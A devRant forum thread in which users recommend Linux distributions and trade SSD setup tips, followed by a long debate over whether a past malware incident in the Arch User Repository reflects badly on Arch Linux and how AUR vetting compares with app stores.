Do all the things like ++ or -- rants, post your own rants, comment on others' rants and build your customized dev avatarSign Up
From the creators of devRant, Pipeless lets you power real-time personalized recommendations and activity feeds using a simple APILearn More
Depends on your needs
jonii25755yDon't think you can just compare them like that.
Depends on your needs and experience.
eemed25yIve tried them all and am now using xubuntu. Its nice that everything just works out of the box.
Linux Mint Cinnamon.
aadilp12945yUbuntu works for me. Haven't tried anything else but I can say that Ubuntu doesn't give you too many problems.
I'm not sure about the defaults settings of mint.
But some pretty important points for Linux on SSDs are:
1. don't use a swap-partition.
Swap is used to write some of your memory to storage.
The frequent write-read-cycles can easily kill some SSDs.
2. tmpfs as /tmp
Linux will write temporary files to /tmp. Here the stuff with read-write-cycles also applies.
Its recommended to mount a tmpfs-partion, that will use a part of your ram, in /tmp.
3. Deactivate Read-Acces-Timestamp
On default, Linux will write the last time, someone accessed a file, to the files metadata.
Again, frequent read-write-cycles.
To prevent this, one has to add the option "noatime" to the lines of your mounted partitions in /etc/fstab.
Elementry os is based upon ubuntu . But it has it's own User interface Pantheon that is very similar to Mac os. Although it is based on Ubuntu , but it is much less bulkier than ubuntu.
djlazz313895yI'm not that much of a Linux guy yet, I've wanted to try to use it, but for now my favorite Linux distro is Android 😂
I would prefer for elements
4. Gentoo √
hasu24095yUbuntu. It's easy to get into and not such a pain like arch.
Also it runs ros :3
Fedora because foss and stable
@EvilArcher i'd love your opinion on the AUR problem related to my earlier comment.
Just interested to know how you tackle this without busting your time too much..
Wack64125y@Kanna if you want to start with a linux distro, I'd personally recommend Ubuntu.
Make sure to use a LTS (Long Time Suport) version (the current is 18.04 and the next will be 20.04). With them you'll get updates for a long time as updating can sometimes break things.
Start with the GUI based stuff and just do what you can with the terminal. Try out stuff. At some point you'll do a lot of things in the terminal.
Once you know your way around, try other distros or replace parts of the system, for example get rid of gnome and use another DM, or try another distro.
That's what I would do.
Potato OS. It's stable as the earth.
Ubuntu has a wide user community in Germany. And seems worldwide pretty accepted.
Arch users just want it the hard way. It's cool but nothing for people not having built their proper compile yet.
And the other one. Guess ist a question of looks.
Well. They're exchangeable and modifyable. Most of all.
Ubuntu now offers the minimal installation. And dual boot with windows works like a charm. So the minimal 'd be my next pick. Wich is a step further to Arch one day.. Buuut. Butt.
tarkanou265yXubuntu anytime of the day.
Ubuntu is stable which is a +
But it has to much bloat in my humble opinion.
I like arch but the downside is a rolling distro. Occasionally a bug passes through. While it's always solvable, its a nuisance when a bug arises while working.
Fedora is sponsored by red hat.
It does a few things a bit different but once you know how fedora works it's rocksolid.
I heard good things about open suse but haven't tried it.
If you want to learn the in and outs of Linux start with arch everything is on the wiki page and is one of the best Linux resource out there.
After that you can go onto Gentoo if you want to delve deeper
@bioDan So, how is it an arch issue? The malware has been removed after being reported. Same as with any other user repository, be it Google Play Store, Microsoft Store, or even GitHub, you shouldn't just blindly trust everyone. Some people will target the maintainers of software you want to use. Hell, at the top of https://aur.archlinux.org there is written, in bold, "DISCLAIMER: AUR packages are user produced content. Any use of the provided files is at your own risk".
Also the article in the rant you linked comes from Sophos blog, so I'm guessing Sophos is just trying to drive installs of its' antivirus by spreading panic.
@SgnfcntOverflow although i had trouble following the coherency in the last comment, allow me to respond.
1. Sophos is more of a firewall than an anti-virus today. Its true that Sophos has been around much more time than Arch Linux (Sophos did start as an antivrus in about 1985 but since 2000+- its primarily a firewaal). I hope you don't think its the same thing. Moreover, its the oldest, best and probably most popular firewall for GNU Linux distros. So they are well establish in the security world for many years now.
2. How is this an Arch issue? Well.. Its the Arch User Repository. If you can't trust packages that come from there, maintaining your system over time will become hell.
And No. To the best of my knowledge appstore/google play DO NOT have malware. Some apps may have tracking cookies, some other apps may steal some personal information. But you can be sure that there IS NO TROJAN HORSE TO TURN YOUR DEVICE TO A ZOMBIE BOT.
3. Oh they fixed it? Good. You have nothing to worry about :)
(until some C&C center will give the signal and your computer will rise from null)
1. I was talking about "Antivirus for Linux" advertised right under article, but yeah, I take that back.
2. Still not seeing it as an Arch issue. You are supposed to read PKGBUILDs before installing packages. If you don't then it's your fault when you install malware, because arch team across all sites mentioning aur explicitly warns you that aur is not official and should be used at your own risk. If you want officially maintained packages then use arch repository (see the lack of user?).
As for malware on Play Store:
So no, software distribution platforms with third-party content are not safe.
3. I don't really know what do you expect them to do. Hack the C&C server to purge malware from infected computers? Because in my opinion they've taken enough steps to prevent this malware from spreading by reverting the changes to PKGBUILD as soon as they were discovered, suspending account from which changes originated and acknowledging the issue on aur-general mailing list. There is no way that they could force the removal of malice packages from affected computers.
@PrivateGER lol ive done that shit a couple of times. Those shady apps are much more about bad/incomplete code than actual malware. When it comes to malware, from my experience, it comes down to gather personal information or monetizing from advertising.
Which ofcourse is BAD but not as bad as a trojan or backdoor.
@SgnfcntOverflow thanks for your reply. Please allow me to respond.
1. Ok. Cool :)
2. I almost completely agree with what you wrote here. There is no 100% security guarantee for any system, be it in the digital realm or the natural realm.
But you didnt take into account these differences when you were making the comparison:
- the workload for each repository: Play store is for Android/Chromium devices with hunderds of millions (if not more) users, against AUR (probably a couple of hundred thousand users, i really dont know and dont plan to check)
- Device type: Play store is more phone/tablet oriented whilst AUR is desktop/laptop oriented.
- Target users: Android is for the general public. AUR is for tech enthusiasts.
3. I expect them to have a more rigorous process of validating packages, whether new/updated, before publishing them to the masses.
I mean, I'm glad they took some measurements for containing and removing the problem. But they wouldn't be in that situation to begin with if security was one of their most primal concerns. Which obviousely wasn't.
Ofcourse they can still improve and make it better, and as an Arch enthusiast yourself i bet you can contribute plenty :)
I'll allow myself for a little renumbering, hope you don't mind :)
1. Regarding workload: Google has a lot bigger budget to address the issue. It also requires registration fee per every user who wants to submit software. To my knowledge aur is not moderated by arch developers but by "Trusted Users" which have been chosen in democratic vote by current TUs. There is around 50 TUs currently, which, compared to multitude of paid Google employees, is nothing. Also (basing on data from statista.com) there is 3.3 million apps on Play Store, while there is 47831 packages in AUR. So Google has to validate only around 70 times more packages.
2. Target users: Arch being targeted at tech enthusiasts actually means that they are more likely to check what they are installing. And in this case this helped spot and remove the malware within few hours from being added to PKGBUILD.
3. Device type: I'm pretty sure Microsoft Store faces the same issue from time to time so it's not limited to phone/tablet.
4. Now, don't get me wrong, I don't mean that it's okay to have some vulnerabilities if others have them. But AUR is not an official repository even if it has Arch in name. Official arch repos are inherently more secure because they are approved by arch maintainers.
5. Security measures: It is not an arch issue. It's AUR issue and it's one of the reasons why AUR should be used with caution, preferably by tech-savvy users. Pre-validated (by TUs) packages from AUR can be found in community repository, which is regarded as more secure than AUR. Of course they could deploy some script which would check the PKGBUILD but that wouldn't help much.
Google has a big advantage here, because they store packages on their servers and can validate them once when they are uploaded. AUR build scripts, on the other hand, pull the source-code from third-party servers. This makes it a lot harder to validate the package while allowing people to share their work as easily as it is now. Said 3rd-party servers or developers' account (along with their keys) may be hijacked, and there is no way to check for that scenario
Also, sorry for the wall of text. :(
@SgnfcntOverflow thanks for your response. I allowed myself to respond according to the new numbering system. My response comes after the '-' character.
Please let me know if the quotes don't accurately summarize your points:
1. 'Google has to validate "only" 70 times more than AUR.' - 70 times more mean a lot more. Especially since there's a non-linear relation between different apps. (Checking 1 well developed game might take much longer than 10 clock apps)
2. 'Arch users are supposed to be more tech-savvy.' - I'm a pro in blaming the user :)
3. 'Device type doesn't matter.' - depends on the level of analysis. Since we are talking about security, i actually think it does. Although there are many similarities, the development environment is still a laptop/desktop/server and not a phone/tablet.
4. 'AUR is not an official repository' and
5. 'Arch is not AUR' - Both true.
But it does come pre-installed with the Arch image and it is recommended to use it (But with care! *wink wink*)
'Google has an edge over Arch' - in many cases yes, but Goohle also has much bigger problems that Arch doesnt have to deal with.
'There is no way to check for that scenario :(' - If that's true, then its a bad architectual design to begin with.
But i believe there are many levels the problem can be solved.
For instance, slowing the flow of deployment of new packages so that there will be more time for validation and inspection of each package before commiting it to the repository. Maybe a more strict methodology like debian/ubuntu or fedora/centos.
Anyway, i feel like we both have our minds made up but i still want to thank you for this conversation.
Arch. Or Darwin haha.
@bioDan Well, I have to thank YOU, as I'm really enjoying this discussion. We have, however, kind of, hijacked this thread.
1. I have to acknowledge that it indeed is a lot bigger library. :)
3. I didn't necessarily mean that device type doesn't matter but rather that it happens on other desktop platforms too, for example Windows (though I don't know if anyone actually uses Microsoft Store). I believe malware has also made it to Ubuntu Snap Store which I think is bundled with newest Ubuntu releases.
4, 5. AUR wrappers don't come pre-installed with pure Arch. Without them installation from AUR requires downloading PKGBUILD and then building with it, and that makes omitting the step of viewing the build script harder. Not displaying PKGBUILD would be deliberately ignoring security by user.
I don't think Arch should be dismissed from distro discussions just because of aur security flaws, as aur is not essential for Arch usage. And those flaws can be overcome by adhering to good advice of checking what you are installing. AUR allows for easier and faster adoption of software but it also requires the users to actually know what they are doing.
On one hand, aur could be adding a note saying that PKGBUILD was not validated unless it got, let's say 10 positive reviews from other maintainers, but on the other hand it would discourage users from validating build scripts themselves.
I don't think that debian, fedora, arch or aur way is perfect. But they all have their audiences and arch can be successfully used without taking the risks of using aur.
@SgnfcntOverflow I'm enjoying our discussion as well 👍
and i agree this post was hijacked but I dont think OP minds, nevertheless i respect your opinion and i agree that Arch shouldn't be dismissed.
But it also shouldn't be put on an altar as the best linux distro or even in the top 3 (in my truly humble opinion).
That being said i love the educational purpose behind it and the fact that it attracts new users to the Linux world.
But using it in production as a server.. Idk, probably someone here has more experience than me as a system-enginee*AHEM* devOps. ( @Bitwise ?)
@Bitwise thanks for your input man! I'm totally with you on the blaming-the-user for-missusing-the-system wagon.
But you can probably say this commit should never enter to production in the Play store (Red Hat distros, Ubuntu, or Debian, etc..) packet managers:
(Notice the last curl addition in the end)
I understand the comparison you make for the AUR not being the official repo for Arch, you do have a point there. and kudos to them for containing and fixing the problem.
But it still is widely used by the "careless" user as it comes pre-installed with the system (unlike the others i mentioned above).
SuryaK14305yYou can't compare operating systems. Each have their unique property designed to satisfy the needs of the...... Arch